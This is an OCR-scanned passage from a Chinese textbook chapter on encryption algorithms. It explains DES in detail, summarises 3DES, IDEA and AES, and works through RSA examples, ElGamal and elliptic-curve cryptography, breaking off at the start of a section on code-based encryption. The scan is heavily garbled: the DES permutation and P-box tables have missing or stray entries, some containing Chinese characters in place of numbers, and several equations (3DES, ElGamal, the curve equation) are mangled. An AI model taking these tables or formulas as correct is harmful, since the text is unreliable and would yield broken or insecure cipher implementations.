(2) 软件 加 密 : 任何 加 密 算 法 都 可 用 软件 来 实现 。 软 件 实现 的 劣势 是 速度 慢 、 开 销 大 
和 易于 改动 ， 而 优势 是 灵活 性 和 可 移植 性 高 ， 容 易 使 用 、 易 于 升级 。 软 件 加 密 程序 很 大 众 
化 ， 并 可 用 于 大 多 数 操作 系统 。 用 户 通 常 可 以 使 用 这 些 加 密 程序 用 于 保护 个 人 信息 。 软 件 
加 密 的 密 钥 管理 很 重要 ， 密 钥 不 应 该 存储 在 磁盘 中 ， 密 钥 和 未 加 密 文件 在 加 密 后 应 立即 删除 。 
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3.2 ”加密 解密 算法 


信息 加 密 是 由 各 种 加 密 算法 实现 的 ， 传 统 的 加 密 系 统 是 以 密 钥 为 基础 的 ， 是 一 种 对 称 
加 密 ， 即 加 密 和 解密 使 用 同一 个 密 钥 。 而 公 钥 则 是 一 种 非 对 称 加 密 方法 。 加 密 者 和 解密 者 
各 自 拥 有 不 同 的 密 钥 ， 密 码 算 法 是 密码 技术 的 一 个 核心 内 容 。 


3.2.1 ”对 称 密码 算法 


对 称 密码 算法 又 称 为 传统 密码 算法 ， 是 应 用 较 早 的 加 密 算 法 ， 技 术 比 较 成 熟 。 在 对 称 
加 密 算法 中 ， 数 据 发 送 方 将 明文 (原始 数据 ); 和 加 密 密 钥 一 起 经 过 特殊 加 密 算法 处 理 后， 使 
其 变 成 复杂 的 加 密 密 文 发 送出 去 。 接 收 方 收 到 密 文 后 ， 若 想 解读 原文 ， 需 要 先 用 加 密 时 使 
用 的 密 钥 及 相同 算法 的 逆 算 法 对 密 文 进行 解密 ， 才 能 使 其 恢复 成 可 读 明文 。 在 对 称 加 密 算 
法 中 ， 使 用 的 密 钥 只 有 一 个 ， 收 发 信 双 方 都 使 用 这 个 密 钥 对 数据 进行 加 密 和 解密 ， 这 就 要 
求 接收 方 必须 事先 知道 加 密 密 钥 。 对 称 加 密 算法 的 优点 是 算法 公开 、 计 算 量 小 、 加 密 速度 
快 、 加 密 效率 高 ， 缺 点 是 通信 双方 都 使 用 相同 的 密 钥 ， 安 全 性 得 不 到 保证 。 此 外 ， 每 对 用 
户 每 次 采用 对 称 加 密 算法 时 ， 都 需要 使 用 其 他 人 不 知道 的 唯一 密 钥 ， 这 会 使 得 发 收 信 双 方 
所 拥有 的 钥匙 数量 呈 几 何 级 数 增长 ， 使 密 钥 管理 成 为 用 户 的 负担 。 对 称 加 密 算法 在 分 布 式 
网 络 系统 上 应 用 较为 困难 ， 主 要 是 因为 密 钥 管理 困难 ， 使 用 成 本 较 高 。 目 前 使 用 较 多 的 对 
称 密码 算法 有 DES 算法 、3DES 算法 、IDEA 算法 和 AES 算法 。 


1. DES 算法 


DES 算法 是 一 种 最 通用 的 对 称 密 钥 算法 ， 属 于 分 组 密码 算法 。DES 算法 公开 发 表 于 
1975 年 3 月 17 日 ,1977 年 1 月 15 日 由 美国 国家 标准 局 颁布 为 数据 加 密 标 准 ， 并 从 1977 
年 7 月 15 日 生效 。DES 算法 主要 用 于 民用 敏感 信息 的 加 密 。 

1) DES 算法 的 运算 过 程 

DES 算法 的 加 密 主要 由 4 个 部 分 组 成 ， 分 别 是 初始 置换 函数 卫 、 子 密 钥 生 成 、 密 码 
函数 F 和 道 初 始 置换 IP"+。DES 算法 操作 流程 如 图 3-9 所 示 。 

其 操作 过 程 如 下 : 首先 通过 一 个 初始 置换 ， 将 64 位 明文 分 组 数据 分 成 左 半 部 分 Li(32 
位 ) 和 右 半 部 分 Ri(32) 位 ; 在 56 位 密 钥 的 控制 下 ， 进 行 16 轮 完全 相同 的 加 密 迭 代 运算 ， 
将 64 位 明文 分 组 数据 变换 为 64 位 密 文 数据 。 

DES 算法 主要 采用 置换 和 移 位 运算 来 实现 加 密 解 密 。 

(1) 初始 置换 函数 卫 

初始 置换 函数 用 来 对 输入 的 64 位 数据 组 进行 换 位 变换 ， 即 按照 规定 的 矩阵 改变 数据 
位 的 排列 顺序 。 

64 位 的 明文 分 组 x 首先 经 过 一 个 初始 置换 函数 耳 进行 置换 运算 ， 产 生 一 个 64 位 的 输 
出 x0， 该 输出 被 分 为 两 个 32 位 的 左 半 部 分 LO 和 右 半 部 分 RO， 用 于 下 函数 的 16 轮 和 迭代 
运算 的 首次 迭代 的 初始 输入 。 

初始 置换 函数 IP 实际 上 是 一 张 8X8 的 和 迭代 表 ， 如 表 3-1 所 示 。 明 文 分 组 中 的 64 位 
按照 表 中 的 规定 重新 进行 排序 ， 排 列 顺序 为 从 左 到 右 ， 从 上 到 下 。 按 表 3-1 所 示 ， 明 文 的 
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第 58 位 放置 在 第 1 位 ， 第 50 位 放置 在 第 2 位 ， 依 此 类 推 ， 最 后 一 位 是 原来 的 第 7 位 。 


64bit 明文 


] 


初始 置换 P 


vy 
逆 初 始 置 换 P-! 


了 
64bit 密 文 


图 3-9 DES 算法 操作 流程 


表 3-1 初始 置换 IP 
58 10 2 
60 12 4 
62 14 6 
64 16 8 
kya 9 1 
59 11 二 
61 13 5 
63 15 
(2) 子 密 钥 生成 


子 密 钥 的 获取 主要 通过 置换 运算 和 移 位 运算 来 实现 。 
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DES 加 密 算法 的 密 钥 长 度 为 56 位 (64 位 去 掉 8 个 校 验 位 ， 每 个 字 节 的 第 8 位 为 校 验 
位 )。 在 DES 加 密 算法 中 ，DES 经 过 一 系列 的 置换 运算 和 移 位 运算 ， 得 到 Kl 到 K16 个 子 
密 铀 ， 每 个 密 钥 长 度 48 位 。 其 实现 过 程 如 下 : 

首先 将 输入 的 64 位 密 钥 去 掉 最 后 一 列 的 8 个 校 验 位 ， 然 后 用 密 钥 置 换 函 数 IP" 对 剩 
下 的 56 位 密 钥 进行 置换 ， 如 表 3-2 所 示 。 


表 3-2 ” 密 钥 置换 函数 IP” 


由 表 3-2 可 以 看 出 ， 用 户 输入 的 64 位 密 钥 中 , 第 8、16、24、32、40、48、56、64 
共 8 个 校 验 位 被 去 除 。 剩 余 的 56 位 按 表 3-2 所 示 排 放 : 第 57 位 放 在 第 1 位 ， 第 49 位 放 
在 第 2 位 ， 依 此 类 推 。 

经 过 IP"! 置换 后 ， 将 其 置换 的 输出 再 分 为 前 28 位 C0 和 后 28 位 D0 两 部 分 ， 两 个 28 
位 按 表 3-3 的 轮 数 进行 不 同位 数 的 左 移 。 


表 3-3 每 轮 移动 位 数 


将 两 部 分 合成 56 位 ， 经 过 压缩 置换 PC? 后 得 到 当前 这 轮 置换 的 48 位 子 密 钥 。 压 缩 
置换 PC” 如 表 3-4 所 示 。 


表 3-4 ”压缩 置换 PC 


14 17 11 
3 28 永 
23 19 12 
16 7 27 
41 52 31 
30 40 51 
44 49 39 
46 42 50 
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PC” 置换 为 压缩 置换 ， 即 置换 后 的 输出 数据 的 位 数 要 比 置换 前 输入 的 位 数 要 少 ， 也 就 
是 说 在 置换 的 过 程 中 ， 某 些 位 的 数据 被 去 掉 了 。 由 表 3-4 可 知 ， 压 缩 置换 过 程 中 ， 原 来 的 
8 行 7 列 56 位 数据 被 压缩 成 了 8 行 6 列 48 位 数据 。 第 9、18、22、25、35、38、43、54 
共 8 位 数据 被 丢掉 了 。 

同时 ， 将 上 一 轮 移 位 后 得 到 的 两 部 分 再 按照 表 3-3 进行 移 位 ， 作 为 下 一 个 子 密 钥 产生 
的 PC” 置换 的 输入 ， 依 次 经 过 16 次 循环 左 移 和 16 次 置换 得 到 16 个 子 密 钥 。 子 密 钥 的 产 
生 过 程 如 图 3-10 所 示 。 


64bit 密 钥 


v 
置换 选择 1 


bl 


| 一 站 置换 选择 2 | yh 


ba 


| a | 


图 3-10 子 密 钥 的 生成 
(3) 密码 函数 下 
密码 函数 F 接收 两 个 输入 : 32 位 的 数据 和 48 位 的 子 密 钥 。 密 码 函 数 F 的 计算 过 
程 为 : 
第 一 步 : 先 将 数据 的 右 半 部 分 通过 扩展 置换 EE 从 32 位 扩展 为 48 位 。 扩 展 置换 函数 也 
如 表 3-5 所 示 。 扩 展 置换 也 称 为 E 盒 变 换 。 


表 3-5 E 盒 变 换 表 
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续 表 


由 表 3-5 中 可 以 看 出 ， 扩 展 置换 通过 将 第 32、1、4、5、8、9、12、13、16、17、 
20、21、24、25、28、29 共 19 位 分 别 放 置 在 两 个 位 置 上 ， 从 而 实现 将 32 位 的 数据 扩展 
成 48 位 。 

第 二 步 : 将 扩展 置换 后 的 48 位 输出 与 压缩 置换 后 的 48 位 密 钥 做 异 或 运算 。 

第 三 步 : 将 异 或 运算 得 到 的 48 位 结果 分 成 8 个 6 位 块 ， 将 每 一 块 通过 对 应 的 一 个 S 
盒 产生 一 个 4 位 的 输出 。 每 个 S 盒 是 一 个 4 行 16 列 的 置换 表 ，S 盒 的 行列 编号 都 从 0 开 
始 。 共 8 个 S 盒 ， 每 个 S 盒 如 表 3-6 所 示 。 


表 3-6 S 盒 变换 表 


mm 1 
| ee ls 
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nn | 
中 Iv 
om |00 


S 盒 接收 6 位 的 输出 ， 经 过 置换 输出 4 位 的 数据 ， 具 体 的 置换 过 程 为 : 将 6 位 输入 中 
的 第 1 位 和 第 6 位 取出 形成 一 个 2 位 的 二 进 制 数 x(0~3)， 该 数 表示 S 盒 的 行 数 ， 然 后 将 
6 位 输入 的 中 间 4 位 构成 另 一 个 二 进 制 数 (0 一 15)， 该 数 表示 S 盒 的 列 数 ， 假 设 S 盒 1 的 
6 位 输入 是 110100， 第 1 位 和 第 6 位 组 合 为 10， 则 行 数 x=2， 中 间 4 位 组 合 为 1010， 则 
得 到 列 数 y 为 10。S1 盒 的 第 2 行 第 10 列 的 数 为 9， 其 二 进 制 数 为 1001( 注 意 ， 行 和 列 的 
计数 都 是 从 0 开始 )。1001 即 为 输出 ， 则 1001 就 代替 了 110100。 

第 4 步 : 将 第 3 步 中 8 个 6 位 数据 的 置换 结果 连 在 一 起 ， 形 成 一 个 32 位 数 ， 输 出 结 
果 再 通过 P 盒 置换 产生 一 个 32 位 的 输出 。P 盒 置 换 如 表 3-7 所 示 。 


表 3-7 P 盒 置 换 

16 汪 

29 12 
1 15 
5 18 
六 8 

32 27 
19 13 
2 a 


第 5 步 : P 盒 置换 的 结果 与 左 半 部 分 进行 异 或 运算 ， 然 后 将 左右 两 部 分 交换 位 置 ， 之 
后 进入 下 一 轮 迭 代 。 

(4) 逆 初 始 置换 IP” 

在 完成 完全 相同 的 16 轮 运算 后 ， 将 得 到 的 两 部 分 数据 合 在 一 起 ， 再 经 过 一 个 逆 初 始 
置换 IP"! 即 可 得 到 64 位 密 文 。 逆 初始 置换 函数 IP- 是 初始 置换 IP 的 逆 运算 ， 如 表 3-8 


所 示 。 
40 8 48 64 了 2 
39 生 47 63 31 
38 6 46 62 30 
37 45 61 29 
36 4 44 60 38 
35 3 43 3 27 
34 2 42 58 26 
33 1 41 57 25 


2) DES 算法 的 优点 和 缺点 
DES 算法 的 优点 主要 有 : 
e@ 算法 设计 巧妙 。DES 算法 密 钥 的 长 度 仅 为 56 位 ， 不 仅 适 合 于 软件 实现 ， 也 适合 
于 硬件 实现 。DES 算法 可 以 被 制 成 专门 的 芯片 ， 应 用 于 加 密 机 中 。 
e@ ”加 密 速度 快 。DES 算法 适合 加 密 较 长 的 明文 信息 。 
@ DES 算法 使 用 16 轮 迭 代 ， 每 一 轮 都 将 把 明文 信息 扩散 到 密 文 ， 完 全 引起 了 足够 
的 扩散 ， 因 此 56 位 密 钥 基本 上 是 安全 的 。 
DES 算法 的 缺点 主要 体现 在 它 采 用 的 是 对 称 密 钥 体制 。 在 密 钥 管理 方面 ， 由 于 密 钥 要 
求 在 通信 前 进行 秘密 分 配 ， 所 以 更 换 密 钥 很 困难 ， 对 不 同 的 通信 对 象 ， 需 产生 和 保管 不 同 
的 密 钥 。 此 外 ， 由 于 DES 超期 服役 ， 安 全 性 比 它 刚 出 来 时 差 很 多 。DES 的 常见 变 体 是 三 
重 DES， 它 是 使 用 168 位 的 密 钥 对 信息 进行 三 次 加 密 的 一 种 机 制 ， 因 此 提供 了 更 为 强大 的 
安全 性 。 
3) ”DES 算法 的 应 用 
DES 算法 主要 有 以 下 几 个 方面 的 应 用 : 
@ ”网 络 通信 : 主要 对 网 络 通 信 中 的 民用 敏感 数据 进行 保护 。 
@ ”保护 用 户 文件 ， 用 户 可 以 利用 DES 算法 对 重要 文件 进行 加 密 保护 ， 防 止 未 授权 
用 户 窃 密 。 
用 户 识别 : DES 算法 可 以 用 于 计算 机 用 户 识别 系统 中 。 
电子 资金 传送 系统 : 使 用 DES 算法 加 密 电 子 资金 传送 系统 中 的 数据 ， 保 证 数据 
准确 、 快 速 地 传送 。 
DES 算法 还 被 广泛 应 用 于 POS、ATM、 磁 卡 及 智能 卡 、 加 油 站 、 高 速 公路 收费 站 等 
领域 。 


2. 3DES 算法 


3DES 又 称 TDES(Triple DES)， 是 DES 加 密 算法 的 一 种 模式 ， 它 使 用 3 个 56 位 的 密 
钥 对 数据 进行 三 次 DES 加 密 。3DES 的 加 密 解 密 过 程 如 图 3-11 和 图 3-12 所 示 。 

3DES 算法 以 DES 为 基本 模块 ， 通 过 组 合 分 组 方法 设计 出 分 组 加 密 算法 ， 其 具体 实现 
如 下 : 设 EO0 和 Dx0 代 表 DES 算法 的 加 密 和 解密 过 程 ，K 代表 DES 算法 使 用 的 密 铀 ，M 
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代表 明文 ，C 代表 密 文 ， 这 样 : 
3DES 加 密 过 程 为 : C=Eis(Di(Ea(M)))。 
3DES 解密 过 程 为 : M=Du((Erz(Dia(C)))。 


3-12 3DES 算法 的 解密 过 程 
3. 国际 数据 加 密 算 法 (IDEA) 


IDEA(International Data Encryption Algorithm) 是 瑞士 的 学 者 提出 的 加 密 算法 ， 在 密码 
学 中 属于 分 组 密码 算法 。IDEA 使 用 长 度 为 128 位 的 密 钥 ,分 组 大 小 为 64 位 。 从 理论 上 
讲 ，IDEA 属于 “ 强 ” 加 密 算法 ， 至 今 还 没有 出 现 对 该 算法 的 有 效 攻 击 算法 。 

IDEA 算法 包含 三 种 运算 : 模 25 加 运算 、 模 2+1 乘 运 算 和 异 或 运算 。 这 三 种 运算 相 
互 混合 可 以 达到 很 好 的 效果 。IDEA 无 论 是 采用 软件 还 是 硬件 实现 都 比较 容易 ， 而 且 加 、 
解密 的 速度 很 快 。 算 法 输入 的 64 位 数据 被 分 成 4 个 16 位 子 分 组 作为 第 一 轮 的 输入 ， 总 共 
有 8 轮 迭 代 。 在 每 一 轮 中 ， 相 互 间 进行 运算 的 同时 也 与 6 个 16 位 子 密 钥 进行 运算 (每 轮 均 
不 同 )， 最 后 还 与 4 个 16 位 子 密 钥 进行 输出 变换 ， 产 生 输 出 ， 其 中 共有 52 个 16 位 的 子 密 
钥 参 与 运算 。 整 个 算法 由 以 下 三 部 分 构成 ; 

e “ 子 密 钥 的 产生 。 输 入 128 位 密 钥 ; 输出 52 个 16 位 的 子 密 钥 。 

@ 加密 过 程 。 输 入 52 个 子 密 钥 和 64 位 数据 ; 输出 64 位 数据 。 

e 解密 过 程 。 加 密 过 程 和 解密 过 程 的 子 密 钥 不 相同 ， 且 两 者 是 一 一 对 应 的 。 

4. AES 算法 

高 级 加 密 标准 AES(Advanced Encryption Standard) 是 美国 国家 标准 技术 研究 所 NIST 旨 
在 取代 DES 的 新 一 代 加 密 标 准 。NIST 于 2000 年 选择 了 比利时 科学 家 提出 的 Rijndael 作 
为 AES 的 算法 。Rijndael 作为 新 一 代 的 数据 加 密 标准 具有 强 安全 性 、 高 性 能 、 高 效率 、 易 
用 和 灵活 等 优点 。AES 算法 属于 分 组 密码 算法 ， 它 设计 有 三 个 密 钥 长 度 : 128、192 和 
256 位 。 


3.2.2” 非 对 称 密码 算法 


非 对 称 密码 算法 也 被 称 为 公 钥 密 码 算法 ， 其 思想 是 由 W.Diffie 和 Hellman 于 1976 
年 提出 的 。 非 对 称 密码 技术 与 以 往 的 加 密 技术 不 同 ， 是 建立 在 数学 函数 基础 上 的 。 与 只 使 
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用 单一 密 钥 的 传统 加 密 技术 相 比 ， 它 在 加 密 解 密 时 ， 分 别 使 用 了 两 个 不 同 的 密 钥 : 一 个 可 
对 外 界 公开 的 公 钥 和 一 个 只 有 所 有 者 知道 的 私 钥 。 公 钥 和 私 钥 之 间 具 有 紧密 联系 ， 用 公 钥 
加 密 的 信息 只 能 用 相应 的 私 钥 解密 ， 反 之 亦 然 。 同 时 ， 要 想 由 一 个 密 钥 推 知 另 一 个 密 钥 ， 
在 计算 上 是 不 可 能 的 。 

非 对 称 加 密 算法 的 基本 原理 是 : 如 果 发 信 方 想 发 送 只 有 收 信 方 才能 解读 的 加 密 信息 ， 
发 信 方 必须 首先 知道 收 信 方 的 公 钥 ， 然 后 利用 收 信 方 的 公 钥 来 加 密 原 文 ， 收 信 方 收 到 加 密 
密 文 后 ， 使 用 自己 的 私 钥 才能 解密 密 文 。 显 然 ， 采 用 不 对 称 加 密 算法 ， 在 通信 之 前 ， 收 信 
方 必须 将 自己 早已 随机 生成 的 公 钥 送 给 发 信 方 ， 而 自己 保留 私 钥 。 由 于 非 对 称 密码 算法 拥 
有 两 个 密 钥 ， 因 此 特别 适用 于 分 布 式 系统 中 的 数据 加 密 。 

非 对 称 密码 算法 主要 有 RSA 算法 、ElGamal 算法 、 椭 圆 曲 线 加 密 算法 (ECC) 等 。 


1. RSA 算法 


为 了 解决 对 称 密码 体制 的 密 钥 分 配 问题 和 对 数字 签名 的 要 求 ，1977 年 Rivest、Shamir 
和 Adleman 提出 了 比较 完善 的 公 钥 密码 体制 的 概念 。 该 体制 的 基础 是 数学 上 的 素数 理论 
(Euler 函数 和 欧 几 里 得 定理 )， 依 赖 于 大 整数 因子 分 解困 难 的 特点 。 该 算法 原理 简单 ， 易 
于 使 用 。 

假设 用 户 A 要 对 发 送 给 B 的 数据 加 密 ， 则 可 根据 以 下 步骤 选择 密 钥 和 进行 密码 
变换 : 

(1) 随机 地 选取 两 个 大 素数 p 和 q( 一 般 为 100 位 以 上 的 十 进 制 数 )，p 不 等 于 q; 

(2) 计算 n=p*q， 作 为 A 的 公开 模 数 ; 

(3) 计算 Euler 函数 

9 (np-1)* (ql1) (mod n) 

(4) 随机 地 选取 一 个 与 (p-1)* (q-1) 互 素 的 整数 e， 作 为 A 的 公开 密 钥 ; 

(5) 用 欧 几 里 得 算法 ， 计 算 满 足 同 余 方程 

E。D=1l (mod q (n)) 的 解 4， 作 为 A 用 户 的 保密 密 钥 ; 

(6) 任何 向 A 发 送 明文 的 用 户 ， 均 可 用 A 的 公开 密 钥 。 和 公开 模 数 n， 根 据 

C=M:’ (mod n) 得 到 密 文 C 
(7) 用 户 A 收 到 C 后 ， 可 利用 自己 的 保密 密 钥 d， 根 据 
M=Cdmodn) 得 到 明文 M 

【 例 3-1】 明文 为 “HI。 则 操作 过 程 如 下 : 

Q@ ”设计 密 钥 公 钥 (e，n) 和 私 钥 (d，n): 

令 p=11，g=5。 取 e=3， 计算: 

n=p*q=55， 求 出 8 (n)=(p-1)*(q-1)=40 

计算 : e。dmod q (n) =1， 即 在 与 55 互 素 的 数 中 选取 与 40 互 素 的 数 

得 : d=27( 保 密 数 )。 因 此 : 公 钥 对 为 (3，55)， 私 钥 对 为 (27，55)。 

@， 加密 : 

按 1-26 的 次 序 排列 字母 ， 则 吾 为 8，I 为 9。 用 公 钥 (3，55) 加 密 : 

E(H)=8? mod 55=17 

ED=93 mod 55=14 
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即 密 文 为 : QN。 

@ 解密 : D(Q)=17” mod 55=8 DO)=14>7 mod 55=9， 还 原 成 功 。 

【 例 3-2】 如 果 选 择 p=17 和 gq=31， 那 么 : 

n=p*q=17°31=527 

中 (n)= (p-1)* (gq-1)=16 * 30=480 

如 果 选 择 e=7， 那 么 计算 : d=e (mod(@ (n)))=7"(mod 480)=343 

使 用 扩展 欧 几 里 得 算法 ， 即 算得 解密 密 钥 d。 

加 密 m 时 需要 公 钥 (e，n)。 如 果 m=2， 那 么 消息 m 被 加 密 为 : 

c=me(mod n)=2 "(mod 527)=128 

解密 时 ， 需 要 密 钥 d， 通 过 下 面 的 公式 计算 得 到 明文 消息 : 

m= cd (mod n)=128’®(mod 527)=2 

RSA 算法 不 仅 可 以 实现 保密 通信 还 能 实现 数字 签名 ， 因 而 特别 适用 于 现代 数字 通信 
的 要 求 。 在 众多 的 公 钥 密码 算法 中 ，RSA 算法 被 认为 是 比较 完善 的 。RSA 算法 至 少 有 以 

1) ”该 算法 原理 简单 ， 易 于 使 用 

数学 表达 式 在 公 钥 密码 算法 中 是 最 容易 理解 和 实现 的 一 个 ， 这 个 算法 也 是 目前 国际 上 
比较 流行 的 公 钥 密码 算法 之 一 。 

2) “算法 可 靠 性 高 

RSA 算法 的 安全 性 取决 于 大 素数 分 解 的 难 易 程度 。 到 目前 为 止 ， 除 了 大 整数 因 式 分 
解 之 外 ， 人 们 还 没有 发 现 其 他 的 方法 能 够 对 RSA 算法 进行 有 效 的 密码 分 析 。 虽 然 RSA 算 
法 也 有 一 些 弱 点 ， 但 是 只 要 设计 密码 参数 时 仔细 一 点 ， 这 些 弱 点 是 可 以 避免 的 。 

3) ”可 用 于 数字 签名 功能 

RSA 算法 具有 一 些 传统 密码 算法 不 能 实现 的 一 些 功能 ， 如 认证 鉴别 和 数字 签名 等 。 

但 是 RSA 算法 也 存在 算法 复杂 、 加 密 解 密 速度 慢 、 难 以 用 硬件 实现 等 缺点 。 因 此 公 
钥 密 码 体制 通常 被 用 来 加 密 关键 性 的 、 核 心 的 、 少 量 的 机 密 信 息 ， 而 对 称 密码 体制 通常 被 
用 来 加 密 数 据 量 大 的 信息 。 


2. EIGamal 算法 


ElGamal 算法 和 RSA 算法 一 样 既 能 用 于 数据 加 密 也 可 以 用 于 数字 签名 ， 其 安全 性 依 
赖 于 计算 有 限 域 上 离散 对 数 这 一 难题 。ElGamal 算法 描述 如 下 : 

假设 用 户 A 想 接收 用 户 B 发 送 的 消息 。 

1) ” 密 钥 创建 

(1) 随机 选择 一 个 大 素数 p， 两 个 随机 数 g 和 d， 且 满足 1<g<p，1<d<p，p-1 有 大 素 
数 因 子 ; 

(2) 计算 e=gtmodp， 其 中 为 公 钥 ，d 为 私 铀 ， 公 钥 传 送 给 用 户 B。 

2) ”加 密 

用 户 B 将 明文 M(<p) 加 密 成 密 文 的 过 程 如 下 : 

(1) 随机 选择 一 个 整数 j，j 与 p-1 互 素 ; 
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(2) 计算 密 文 a=gitmod p) 和 b=ei(mod p)，(a，b) 是 密 文 ， 长 度 是 明文 的 两 倍 。 

用 户 B 将 密 文 (a，b) 传 送 给 用 户 A。 

3) ”解密 

用 户 A 收 到 密 文 后 ， 进 行 解密 计算 

M=b/al(mod p) 

ElGamal 算法 中 随机 选择 的 素数 P 必须 足够 大 ， 且 p-1 至 少 包含 一 个 大 素数 因子 用 来 
抵抗 Pohlig-Hellman 算法 的 攻击 。ElGamal 算法 的 安全 性 主要 依赖 于 p 和 g 的 值 ， 若 选取 
不 当 签 名 容易 伪造 ， 因 此 应 保证 g 对 于 p-1 的 大 素数 因子 是 不 可 约 的 。 


3. 椭圆 曲线 加 密 算法 


椭圆 曲线 加 密 算法 (ECC，Elliptic Curve Cryptosystem) 是 由 Koblity 和 Miller 于 1985 年 
提出 的 。 椭 圆 曲 线 加 密 算法 使 用 椭圆 曲线 作为 公 钥 密 码 体制 的 基础 ， 并 用 有 限 域 上 的 椭圆 
曲线 实现 了 已 存在 的 公 钥 密码 算法 。 由 于 椭圆 曲线 上 的 离散 对 数 计算 要 比 有 限 域 上 的 离散 
对 数 的 计算 更 困难 ， 而 且 它 在 同等 长 度 的 密 钥 下 能 够 获得 比 RSA 算法 更 快 的 加 解密 速度 
和 更 高 的 密码 强度 ， 因 而 成 为 目前 国际 上 密码 学 研究 的 热点 之 一 。 

1) ”椭圆 曲线 的 概念 

椭圆 曲线 指 的 是 由 维 斯 特 拉 斯 方程 只 Haxy+by 王 xs+cxz+dx+e 所 确定 的 平面 曲线 。 若 
F 是 一 个 域 ，a，b，c，d，e EF， 且 4a3+27b*(mod p)#*0， 满 足 维 斯 特 拉 斯 方程 的 数 偶 
(x，y) 称 为 F 域 上 的 椭圆 曲线 E 的 点 。F 域 可 以 是 有 理 数 域 ， 也 可 以 是 复数 域 ， 还 可 以 是 
有 限 域 GF(Pr)。 椭 圆 曲 线 通常 用 E 表示 。 除 了 曲线 E 上 的 所 有 点 外 ， 还 需要 加 上 一 个 叫 
做 无 穷 远 点 的 特殊 点 O。 

椭圆 曲线 密码 体制 就 是 建立 在 对 椭圆 曲 线 离散 对 数 问 题 (ECDLP) 求 解困 难 性 假设 基础 
上 的 ， 它 优 于 基于 有 限 域 的 乘法 群 上 的 离散 对 数 问题 。 

目前 ， 多 家 标准 化 组 织 在 椭圆 曲线 标准 化 方面 都 提出 了 自己 的 标准 ， 其 中 最 有 影响 的 
是 由 美国 国家 标准 学 会 ANSI 制定 的 X9.62 和 X9.63 两 个 标准 。 以 上 两 个 标准 在 引用 了 
NIST 部 分 标准 的 基础 实现 了 对 椭圆 曲线 数字 签名 算法 (ECDSA)、 密 钥 协商 算法 (ECDH， 
ECMQV)、 密 钥 管 理 和 传输 的 标准 化 。 

2) ”椭圆 曲线 密码 算法 的 优点 

(1) 算法 安全 性 能 更 高 

椭圆 曲线 密码 算法 具有 最 强 的 单 比特 安全 性 。 每 一 比特 椭圆 曲线 密码 算法 的 密 钥 至 少 
相当 于 5 比特 长 的 RSA 密 钥 的 安全 性 ， 并 且 这 种 比例 关系 随 着 密 钥 长 度 的 增加 呈 上 升 趋 
势 。 在 相同 密 钥 长 度 条 件 下 ， 椭 圆 曲 线 密码 算法 比 RSA 安全 性 要 高 。 

(2) 算法 计算 量 小 ， 运 算 速度 快 

在 相同 的 计算 条 件 下 ， 虽 然 RSA 算法 可 以 通过 选取 较 小 的 公 钥 (可 小 到 3) 的 方法 来 提 
高 公 钥 的 处 理 速度 ， 使 其 在 加 密 和 签名 验证 速度 上 与 椭圆 曲线 密码 算法 有 可 比 性 。 但 是 在 
私 钥 的 处 理 速度 上 (解密 和 签名 )， 椭 圆 曲 线 密码 算法 远 比 RSA 要 快 得 多 。 因 此 椭圆 曲线 密 
码 算法 总 的 运算 速度 要 比 RSA 快 得 多 。 同 时 椭圆 曲线 密码 算法 的 密 钥 生成 速度 比 RSA 要 
快 百倍 以 上 。 
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(3) 算法 占用 存储 空间 小 

椭圆 曲线 密码 算法 的 密 钥 尺 寸 和 系统 参数 较 RSA 算法 和 ElGamal 算法 要 小 得 多 。 
160 位 ECC 和 1024 位 RSA 具有 相同 的 安全 强度 ，220 位 ECC 则 与 2048 位 RSA 具有 相 
同 的 安全 强度 。 这 就 意味 着 安全 强度 相同 的 条 件 下 ，ECC 算法 所 占 的 存储 空间 比 RSA 算 
法 要 小 。 这 对 于 密码 算法 在 资源 受 限 制 环境 (比如 智能 卡 ) 的 应 用 具有 特别 重要 的 意义 。 

(4) 通信 带宽 要 求 低 

当 对 长 消息 进行 加 解密 时 ， 椭 圆 曲线 密码 算法 和 RSA 有 相同 的 带宽 要 求 ， 但 应 用 于 
短 消息 时 ， 椭 圆 曲线 密码 算法 的 带宽 要 求 却 比 RSA 低 得 多 。 而 公 钥 系统 多 用 于 短 消息 ， 
如 密 钥 交换 和 数字 签名 ， 所 以 椭圆 曲线 密码 算法 在 无 线 网 络 领域 具有 更 广泛 的 应 用 前 景 。 

(5) 灵活 性 好 

在 有 限 域 GF(p) 一 定 的 情况 下 ， 其 上 的 循环 群 也 就 定 了 ; 但 GF(p) 上 的 椭圆 曲线 可 以 
通过 改变 曲线 参数 ， 得 到 不 同 的 曲线 ， 形 成 不 同 的 循环 群 。 因 此 ， 椭 圆 曲 线 具有 丰富 的 群 
结构 和 多 选择 性 。 

由 于 椭圆 曲线 以 上 的 优点 ， 尤 其 是 其 “ 短 密 钥 ” 的 特点 ， 可 以 带 来 更 高 的 安全 性 ， 椭 
圆 曲 线 密 码 体制 越 来 越 成 为 研究 工作 者 关注 的 热点 。 当 然 ， 椭 圆 曲 线 也 存在 一 些 缺点 ， 比 
如 椭圆 曲线 的 群 运算 比较 复杂 ， 不 如 RSA 算法 那么 简洁 。RSA 中 的 运算 只 涉及 整数 的 模 
运算 ， 但 椭圆 曲线 密码 算法 会 涉及 有 限 域 中 的 乘法 和 求 逆 运 算 ， 因 此 在 同样 的 安全 性 下 ， 
与 RSA 相 比 椭圆 曲线 密码 算法 在 速度 上 并 不 占 明 显 的 优势 。 而 且 在 对 椭圆 曲线 的 研究 及 
各 种 基于 椭圆 曲线 加 密 、 签 名 方案 提出 的 同时 ， 针 对 椭圆 曲线 的 攻击 也 越 来 越 多 ， 尤 其 是 
针对 一 些 特殊 椭圆 曲线 的 攻击 已 经 有 了 很 有 效 的 方法 。 


3.3 ”常用 加 密 解 密 技术 


加 密 不 仅 可 以 保护 机 密 信 息 ， 也 可 以 用 于 协助 认证 过 程 。 主 要 有 三 种 加 密 方法 : 
(1) 对 称 加 密 : 加 密 和 解密 使 用 相同 的 密 钥 。 
(2) 非 对 称 加 密 : 也 称 为 公 钥 加 密 ， 分 别 使 用 一 对 密 钥 进行 数据 加 密 。 
(3) 单 向 加 密 : 也 称 HASH 加 密 ， 使 用 HASH 函数 的 方法 进行 加 密 。 
3.3.1 对 称 加 密 技术 


常用 的 对 称 加 密 技 术 主要 有 4 种 方法 : 代码 加 密 、 蔡 换 加 密 、 变 位 加 密 和 一 次 性 
加 密 。 


1. 代码 加 密 


利用 传输 双方 预先 设 定 的 一 组 代码 发 送 保密 信息 是 保证 信息 安全 传输 的 最 简单 方法 。 
它 使 用 通信 双方 预先 设 定 的 一 组 有 确切 含义 的 代码 ， 如 日 常 词汇 、 专 有 名 词 、 特 殊 用 语 等 
